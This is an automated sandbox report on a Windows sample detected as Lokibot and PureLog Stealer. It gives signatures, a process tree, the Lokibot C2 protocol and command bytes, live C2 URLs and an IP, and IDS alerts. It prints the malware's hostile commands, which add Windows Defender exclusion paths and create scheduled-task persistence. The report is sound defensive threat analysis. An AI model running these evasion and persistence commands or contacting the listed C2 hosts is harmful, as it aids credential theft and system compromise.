Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation2025-0107pdf.exe

Overview

General Information

Sample name:Quotation2025-0107pdf.exe
Analysis ID:1585262
MD5:ff0a37e1048052c58526a9c38efc1954
SHA1:cdb18e6094372c6ab8280723bb9c64b9ba8269da
SHA256:9e39a3fc8fca2cc19c64e0c75e88f897a7d07f43d3430596fecdccae2b36d680
Tags:exeLokiuser-abuse_ch
Infos:

Detection

Lokibot, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Lokibot
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Quotation2025-0107pdf.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe" MD5: FF0A37E1048052C58526A9C38EFC1954)
    • powershell.exe (PID: 7524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7924 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7604 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Quotation2025-0107pdf.exe (PID: 7772 cmdline: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe" MD5: FF0A37E1048052C58526A9C38EFC1954)
  • mexnJkivovwH.exe (PID: 7908 cmdline: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe MD5: FF0A37E1048052C58526A9C38EFC1954)
    • schtasks.exe (PID: 8080 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mexnJkivovwH.exe (PID: 8124 cmdline: "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe" MD5: FF0A37E1048052C58526A9C38EFC1954)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x17ad8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x4ea3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 57 entries
          SourceRuleDescriptionAuthorStrings
          9.2.mexnJkivovwH.exe.3cca880.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.Quotation2025-0107pdf.exe.4b08eb0.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.Quotation2025-0107pdf.exe.9a00000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Click to see the 84 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation2025-0107pdf.exe, ParentProcessId: 7332, ParentProcessName: Quotation2025-0107pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ProcessId: 7524, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation2025-0107pdf.exe, ParentProcessId: 7332, ParentProcessName: Quotation2025-0107pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ProcessId: 7524, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe, ParentImage: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe, ParentProcessId: 7908, ParentProcessName: mexnJkivovwH.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp", ProcessId: 8080, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation2025-0107pdf.exe, ParentProcessId: 7332, ParentProcessName: Quotation2025-0107pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp", ProcessId: 7604, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation2025-0107pdf.exe, ParentProcessId: 7332, ParentProcessName: Quotation2025-0107pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ProcessId: 7524, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation2025-0107pdf.exe, ParentProcessId: 7332, ParentProcessName: Quotation2025-0107pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp", ProcessId: 7604, ProcessName: schtasks.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T12:32:01.519943+010020243121A Network Trojan was detected192.168.2.44973594.156.177.4180TCP
                    2025-01-07T12:32:02.466654+010020243121A Network Trojan was detected192.168.2.44973794.156.177.4180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T12:32:00.796955+010020253811Malware Command and Control Activity Detected192.168.2.44973594.156.177.4180TCP
                    2025-01-07T12:32:01.754699+010020253811Malware Command and Control Activity Detected192.168.2.44973794.156.177.4180TCP
                    2025-01-07T12:32:02.549908+010020253811Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
                    2025-01-07T12:32:03.602114+010020253811Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
                    2025-01-07T12:32:04.490438+010020253811Malware Command and Control Activity Detected192.168.2.44974194.156.177.4180TCP
                    2025-01-07T12:32:05.412187+010020253811Malware Command and Control Activity Detected192.168.2.44974294.156.177.4180TCP
                    2025-01-07T12:32:07.187246+010020253811Malware Command and Control Activity Detected192.168.2.44974394.156.177.4180TCP
                    2025-01-07T12:32:08.083804+010020253811Malware Command and Control Activity Detected192.168.2.44974494.156.177.4180TCP
                    2025-01-07T12:32:08.974835+010020253811Malware Command and Control Activity Detected192.168.2.44974594.156.177.4180TCP
                    2025-01-07T12:32:10.073415+010020253811Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
                    2025-01-07T12:32:11.223373+010020253811Malware Command and Control Activity Detected192.168.2.44974794.156.177.4180TCP
                    2025-01-07T12:32:12.117368+010020253811Malware Command and Control Activity Detected192.168.2.44974994.156.177.4180TCP
                    2025-01-07T12:32:13.004316+010020253811Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
                    2025-01-07T12:32:13.932697+010020253811Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
                    2025-01-07T12:32:14.805465+010020253811Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
                    2025-01-07T12:32:15.769592+010020253811Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
                    2025-01-07T12:32:16.694494+010020253811Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
                    2025-01-07T12:32:17.621099+010020253811Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
                    2025-01-07T12:32:18.524599+010020253811Malware Command and Control Activity Detected192.168.2.44976194.156.177.4180TCP
                    2025-01-07T12:32:19.413561+010020253811Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
                    2025-01-07T12:32:20.319720+010020253811Malware Command and Control Activity Detected192.168.2.44976394.156.177.4180TCP
                    2025-01-07T12:32:21.208840+010020253811Malware Command and Control Activity Detected192.168.2.44976494.156.177.4180TCP
                    2025-01-07T12:32:22.190721+010020253811Malware Command and Control Activity Detected192.168.2.44976594.156.177.4180TCP
                    2025-01-07T12:32:23.083462+010020253811Malware Command and Control Activity Detected192.168.2.44976694.156.177.4180TCP
                    2025-01-07T12:32:23.973870+010020253811Malware Command and Control Activity Detected192.168.2.44976794.156.177.4180TCP
                    2025-01-07T12:32:24.880636+010020253811Malware Command and Control Activity Detected192.168.2.44976894.156.177.4180TCP
                    2025-01-07T12:32:25.829746+010020253811Malware Command and Control Activity Detected192.168.2.44976994.156.177.4180TCP
                    2025-01-07T12:32:26.723358+010020253811Malware Command and Control Activity Detected192.168.2.44977094.156.177.4180TCP
                    2025-01-07T12:32:27.582510+010020253811Malware Command and Control Activity Detected192.168.2.44977194.156.177.4180TCP
                    2025-01-07T12:32:28.619054+010020253811Malware Command and Control Activity Detected192.168.2.44977294.156.177.4180TCP
                    2025-01-07T12:32:29.504390+010020253811Malware Command and Control Activity Detected192.168.2.44977394.156.177.4180TCP
                    2025-01-07T12:32:30.382420+010020253811Malware Command and Control Activity Detected192.168.2.44977494.156.177.4180TCP
                    2025-01-07T12:32:31.256603+010020253811Malware Command and Control Activity Detected192.168.2.44977594.156.177.4180TCP
                    2025-01-07T12:32:32.155614+010020253811Malware Command and Control Activity Detected192.168.2.44977694.156.177.4180TCP
                    2025-01-07T12:32:33.032901+010020253811Malware Command and Control Activity Detected192.168.2.44977794.156.177.4180TCP
                    2025-01-07T12:32:33.924411+010020253811Malware Command and Control Activity Detected192.168.2.44977894.156.177.4180TCP
                    2025-01-07T12:32:34.814297+010020253811Malware Command and Control Activity Detected192.168.2.44977994.156.177.4180TCP
                    2025-01-07T12:32:35.704114+010020253811Malware Command and Control Activity Detected192.168.2.44978094.156.177.4180TCP
                    2025-01-07T12:32:36.588546+010020253811Malware Command and Control Activity Detected192.168.2.44978194.156.177.4180TCP
                    2025-01-07T12:32:37.473584+010020253811Malware Command and Control Activity Detected192.168.2.44978294.156.177.4180TCP
                    2025-01-07T12:32:38.360546+010020253811Malware Command and Control Activity Detected192.168.2.44978394.156.177.4180TCP
                    2025-01-07T12:32:39.253004+010020253811Malware Command and Control Activity Detected192.168.2.44978494.156.177.4180TCP
                    2025-01-07T12:32:40.116039+010020253811Malware Command and Control Activity Detected192.168.2.44978594.156.177.4180TCP
                    2025-01-07T12:32:40.987508+010020253811Malware Command and Control Activity Detected192.168.2.44978694.156.177.4180TCP
                    2025-01-07T12:32:41.861754+010020253811Malware Command and Control Activity Detected192.168.2.44978794.156.177.4180TCP
                    2025-01-07T12:32:42.736881+010020253811Malware Command and Control Activity Detected192.168.2.44978894.156.177.4180TCP
                    2025-01-07T12:32:43.630025+010020253811Malware Command and Control Activity Detected192.168.2.44978994.156.177.4180TCP
                    2025-01-07T12:32:44.529692+010020253811Malware Command and Control Activity Detected192.168.2.44979094.156.177.4180TCP
                    2025-01-07T12:32:45.411818+010020253811Malware Command and Control Activity Detected192.168.2.44979194.156.177.4180TCP
                    2025-01-07T12:32:46.293457+010020253811Malware Command and Control Activity Detected192.168.2.44979294.156.177.4180TCP
                    2025-01-07T12:32:47.179130+010020253811Malware Command and Control Activity Detected192.168.2.44979394.156.177.4180TCP
                    2025-01-07T12:32:48.074620+010020253811Malware Command and Control Activity Detected192.168.2.44979494.156.177.4180TCP
                    2025-01-07T12:32:48.984690+010020253811Malware Command and Control Activity Detected192.168.2.44979594.156.177.4180TCP
                    2025-01-07T12:32:49.862472+010020253811Malware Command and Control Activity Detected192.168.2.44979694.156.177.4180TCP
                    2025-01-07T12:32:50.758629+010020253811Malware Command and Control Activity Detected192.168.2.44979894.156.177.4180TCP
                    2025-01-07T12:32:51.655150+010020253811Malware Command and Control Activity Detected192.168.2.44979994.156.177.4180TCP
                    2025-01-07T12:32:52.567085+010020253811Malware Command and Control Activity Detected192.168.2.44980094.156.177.4180TCP
                    2025-01-07T12:32:53.479625+010020253811Malware Command and Control Activity Detected192.168.2.44980194.156.177.4180TCP
                    2025-01-07T12:32:54.584481+010020253811Malware Command and Control Activity Detected192.168.2.44980394.156.177.4180TCP
                    2025-01-07T12:32:55.446641+010020253811Malware Command and Control Activity Detected192.168.2.44980494.156.177.4180TCP
                    2025-01-07T12:32:56.333834+010020253811Malware Command and Control Activity Detected192.168.2.44981094.156.177.4180TCP
                    2025-01-07T12:32:57.237309+010020253811Malware Command and Control Activity Detected192.168.2.44981694.156.177.4180TCP
                    2025-01-07T12:32:58.121179+010020253811Malware Command and Control Activity Detected192.168.2.44982294.156.177.4180TCP
                    2025-01-07T12:32:59.003527+010020253811Malware Command and Control Activity Detected192.168.2.44982894.156.177.4180TCP
                    2025-01-07T12:32:59.878899+010020253811Malware Command and Control Activity Detected192.168.2.44983794.156.177.4180TCP
                    2025-01-07T12:33:00.752916+010020253811Malware Command and Control Activity Detected192.168.2.44984394.156.177.4180TCP
                    2025-01-07T12:33:01.662274+010020253811Malware Command and Control Activity Detected192.168.2.44984994.156.177.4180TCP
                    2025-01-07T12:33:02.549471+010020253811Malware Command and Control Activity Detected192.168.2.44985794.156.177.4180TCP
                    2025-01-07T12:33:03.476176+010020253811Malware Command and Control Activity Detected192.168.2.44986394.156.177.4180TCP
                    2025-01-07T12:33:04.420628+010020253811Malware Command and Control Activity Detected192.168.2.44986994.156.177.4180TCP
                    2025-01-07T12:33:05.289917+010020253811Malware Command and Control Activity Detected192.168.2.44987594.156.177.4180TCP
                    2025-01-07T12:33:06.157706+010020253811Malware Command and Control Activity Detected192.168.2.44988294.156.177.4180TCP
                    2025-01-07T12:33:07.168337+010020253811Malware Command and Control Activity Detected192.168.2.44988894.156.177.4180TCP
                    2025-01-07T12:33:08.065316+010020253811Malware Command and Control Activity Detected192.168.2.44989894.156.177.4180TCP
                    2025-01-07T12:33:08.983613+010020253811Malware Command and Control Activity Detected192.168.2.44990494.156.177.4180TCP
                    2025-01-07T12:33:10.036766+010020253811Malware Command and Control Activity Detected192.168.2.44991094.156.177.4180TCP
                    2025-01-07T12:33:10.925247+010020253811Malware Command and Control Activity Detected192.168.2.44991894.156.177.4180TCP
                    2025-01-07T12:33:11.841098+010020253811Malware Command and Control Activity Detected192.168.2.44992794.156.177.4180TCP
                    2025-01-07T12:33:12.953872+010020253811Malware Command and Control Activity Detected192.168.2.44993394.156.177.4180TCP
                    2025-01-07T12:33:13.973579+010020253811Malware Command and Control Activity Detected192.168.2.44994194.156.177.4180TCP
                    2025-01-07T12:33:14.849018+010020253811Malware Command and Control Activity Detected192.168.2.44995094.156.177.4180TCP
                    2025-01-07T12:33:15.804831+010020253811Malware Command and Control Activity Detected192.168.2.44995694.156.177.4180TCP
                    2025-01-07T12:33:16.682925+010020253811Malware Command and Control Activity Detected192.168.2.44996294.156.177.4180TCP
                    2025-01-07T12:33:17.566164+010020253811Malware Command and Control Activity Detected192.168.2.44996894.156.177.4180TCP
                    2025-01-07T12:33:18.615544+010020253811Malware Command and Control Activity Detected192.168.2.44997494.156.177.4180TCP
                    2025-01-07T12:33:19.538604+010020253811Malware Command and Control Activity Detected192.168.2.44998594.156.177.4180TCP
                    2025-01-07T12:33:20.414906+010020253811Malware Command and Control Activity Detected192.168.2.44999194.156.177.4180TCP
                    2025-01-07T12:33:21.330905+010020253811Malware Command and Control Activity Detected192.168.2.44999794.156.177.4180TCP
                    2025-01-07T12:33:22.254058+010020253811Malware Command and Control Activity Detected192.168.2.45000394.156.177.4180TCP
                    2025-01-07T12:33:23.161672+010020253811Malware Command and Control Activity Detected192.168.2.45001094.156.177.4180TCP
                    2025-01-07T12:33:24.052352+010020253811Malware Command and Control Activity Detected192.168.2.45001994.156.177.4180TCP
                    2025-01-07T12:33:24.970591+010020253811Malware Command and Control Activity Detected192.168.2.45002694.156.177.4180TCP
                    2025-01-07T12:33:25.885204+010020253811Malware Command and Control Activity Detected192.168.2.45003294.156.177.4180TCP
                    2025-01-07T12:33:26.771343+010020253811Malware Command and Control Activity Detected192.168.2.45003894.156.177.4180TCP
                    2025-01-07T12:33:27.680964+010020253811Malware Command and Control Activity Detected192.168.2.45004594.156.177.4180TCP
                    2025-01-07T12:33:28.568840+010020253811Malware Command and Control Activity Detected192.168.2.45005494.156.177.4180TCP
                    2025-01-07T12:33:29.482591+010020253811Malware Command and Control Activity Detected192.168.2.45006094.156.177.4180TCP
                    2025-01-07T12:33:30.418199+010020253811Malware Command and Control Activity Detected192.168.2.45006794.156.177.4180TCP
                    2025-01-07T12:33:31.283218+010020253811Malware Command and Control Activity Detected192.168.2.45007394.156.177.4180TCP
                    2025-01-07T12:33:32.183439+010020253811Malware Command and Control Activity Detected192.168.2.45007994.156.177.4180TCP
                    2025-01-07T12:33:33.064766+010020253811Malware Command and Control Activity Detected192.168.2.45008694.156.177.4180TCP
                    2025-01-07T12:33:33.993234+010020253811Malware Command and Control Activity Detected192.168.2.45009494.156.177.4180TCP
                    2025-01-07T12:33:34.894254+010020253811Malware Command and Control Activity Detected192.168.2.45010094.156.177.4180TCP
                    2025-01-07T12:33:35.815203+010020253811Malware Command and Control Activity Detected192.168.2.45010694.156.177.4180TCP
                    2025-01-07T12:33:36.704614+010020253811Malware Command and Control Activity Detected192.168.2.45011294.156.177.4180TCP
                    2025-01-07T12:33:37.618568+010020253811Malware Command and Control Activity Detected192.168.2.45011494.156.177.4180TCP
                    2025-01-07T12:33:38.510581+010020253811Malware Command and Control Activity Detected192.168.2.45011594.156.177.4180TCP
                    2025-01-07T12:33:39.427169+010020253811Malware Command and Control Activity Detected192.168.2.45011694.156.177.4180TCP
                    2025-01-07T12:33:40.300156+010020253811Malware Command and Control Activity Detected192.168.2.45011794.156.177.4180TCP
                    2025-01-07T12:33:41.178680+010020253811Malware Command and Control Activity Detected192.168.2.45011894.156.177.4180TCP
                    2025-01-07T12:33:42.221421+010020253811Malware Command and Control Activity Detected192.168.2.45011994.156.177.4180TCP
                    2025-01-07T12:33:43.104720+010020253811Malware Command and Control Activity Detected192.168.2.45012094.156.177.4180TCP
